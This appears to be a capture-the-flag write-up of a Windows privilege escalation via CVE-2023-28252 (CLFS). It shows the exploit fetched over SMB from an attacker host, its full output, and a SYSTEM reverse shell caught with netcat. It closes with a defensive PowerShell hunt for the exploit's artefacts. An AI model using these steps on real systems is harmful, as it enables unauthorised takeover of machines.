CVE-2023-28252
A vulnerability was found in Microsoft Windows (Operating System) and rated high severity. It affects the Common Log File System (CLFS) driver and lets a local, low-privileged user elevate to SYSTEM, so it impacts confidentiality, integrity, and availability.
The vulnerability has been extensively researched by Fortra.
Exploit
The PoC is available on Fortra's GitHub.
I will download and compile the exploit package
Exploitation
PS C:\Users\sam.emerson\Documents> copy \\10.10.14.4\test\clfs_eop.exe .
Delivery complete over SMB
PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe
.\clfs_eop.exe
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFC5C984240
[+] pool NpAt VirtualAddress -->FFFFC20AA30FF000
[+] MY EPROCESSS FFFFD58F670A31C0
[+] SYSTEM EPROCESSS FFFFD58F5E6FC040
[+] _ETHREAD ADDRESS FFFFD58F612BA080
[+] PREVIOUS MODE ADDRESS FFFFD58F612BA2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80360583220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8036059BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80362F43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF803635C87B0
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF80362FDBD00
PATHS
[+] folder public path = c:\Users\Public
[+] base log file name path= log:C:\Users\Public\14
[+] base file path = c:\Users\Public\14.blf
[+] container file name path = c:\Users\Public\.p_14
Last kernel CLFS address = FFFFC20A952D0000
numero de tags CLFS founded 11
Last kernel CLFS address = FFFFC20A9C9CB000
numero de tags CLFS founded 1
[+] log file handle: 0000000000000110
[+] pool clfs kernel address: FFFFC20A9C9CB000
number of pipes created =5000
number of pipes created =4000
TRIGGER START
system_token_value: FFFFC20A9064159B
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
Executing
PS C:\Users\admin\Desktop\ThemeBleed> .\nc64.exe -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.237] 64114
PS C:\Users\sam.emerson\Documents> whoami
nt authority\system
PS C:\Users\sam.emerson\Documents> hostname
aero
PS C:\Users\sam.emerson\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::177
IPv6 Address. . . . . . . . . . . : dead:beef::5aa2:a858:ac20:b1e7
Temporary IPv6 Address. . . . . . : dead:beef::9d34:25ac:aeff:695a
Link-local IPv6 Address . . . . . : fe80::f370:3a1d:f4c0:2fa%14
IPv4 Address. . . . . . . . . . . : 10.10.11.237
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%14
10.10.10.2
System Level Compromise
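The exploit output above shows what this PoC leaves on disk: a base log file C:\Users\Public\14.blf and a container file C:\Users\Public\.p_14, plus a burst of thousands of named pipes while the pool is being groomed. Those artefacts are what a defender can hunt for after the fact. The following PowerShell script is an added example for this write-up, not code from the original post or from Fortra's PoC. It assumes the directory list, the 24-hour look-back window and the presence of Sysmon with a FileCreate rule; adjust them for the host. Note that a failed run of a kernel pool corruption exploit like this one can crash the target, so a post-incident hunt should also check for unexpected reboots in the same window.

```powershell
# Added example for this write-up; not part of the original post or of Fortra's PoC.
# Hunts for the on-disk artefacts a CLFS exploit of this kind leaves behind. The
# naming mirrors the exploit output above: a base log file <name>.blf and a
# container file .p_<name> side by side in C:\Users\Public. The directory list,
# the 24-hour window and the Sysmon rule being present are assumptions.

function Find-ClfsArtifacts {
    param(
        [string[]]$Roots = @($env:PUBLIC, $env:TEMP, $env:ProgramData, 'C:\Users'),
        [int]$LookbackHours = 24
    )
    $cutoff = (Get-Date).AddHours(-$LookbackHours)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        # .blf files are normal under %SystemRoot%\System32\Config and a few
        # service directories; in user-writable locations they deserve a look.
        Get-ChildItem -LiteralPath $root -Recurse -Force -File -Filter '*.blf' -ErrorAction SilentlyContinue |
            Where-Object { $_.LastWriteTime -ge $cutoff } |
            ForEach-Object {
                $name      = [IO.Path]::GetFileNameWithoutExtension($_.Name)
                # The PoC names its container ".p_<logname>" next to the .blf
                $container = Join-Path $_.DirectoryName ".p_$name"
                [pscustomobject]@{
                    BaseLogFile = $_.FullName
                    Container   = $(if (Test-Path -LiteralPath $container) { $container } else { $null })
                    LastWrite   = $_.LastWriteTime
                    SizeBytes   = $_.Length
                    Owner       = (Get-Acl -LiteralPath $_.FullName).Owner
                }
            }
    }
}

function Get-ClfsFileCreateEvents {
    param([int]$LookbackHours = 24)
    # Sysmon Event ID 11 (FileCreate). Only present if Sysmon is installed and its
    # configuration logs .blf creations; Get-WinEvent throws when nothing matches.
    try {
        Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-Sysmon/Operational'
            Id        = 11
            StartTime = (Get-Date).AddHours(-$LookbackHours)
        } -ErrorAction Stop |
        Where-Object { $_.Message -match '(?m)^TargetFilename:\s*.+\.blf\s*$' } |
        ForEach-Object {
            $m = $_.Message
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Image  = $(if ($m -match '(?m)^Image:\s*(.+?)\s*$') { $Matches[1] } else { $null })
                Target = $(if ($m -match '(?m)^TargetFilename:\s*(.+?)\s*$') { $Matches[1] } else { $null })
            }
        }
    } catch {
        Write-Warning "No Sysmon FileCreate events for .blf in the window ($($_.Exception.Message))"
    }
}

# Run both hunts and print a combined report.
Find-ClfsArtifacts | Format-Table -AutoSize
Get-ClfsFileCreateEvents | Format-Table -AutoSize
```

Run it from an elevated PowerShell on the suspected host. The first function works on any Windows box and would flag the 14.blf / .p_14 pair from this session; the second only returns rows where Sysmon is deployed and its configuration includes .blf under FileCreate, which is worth adding if it is not already there.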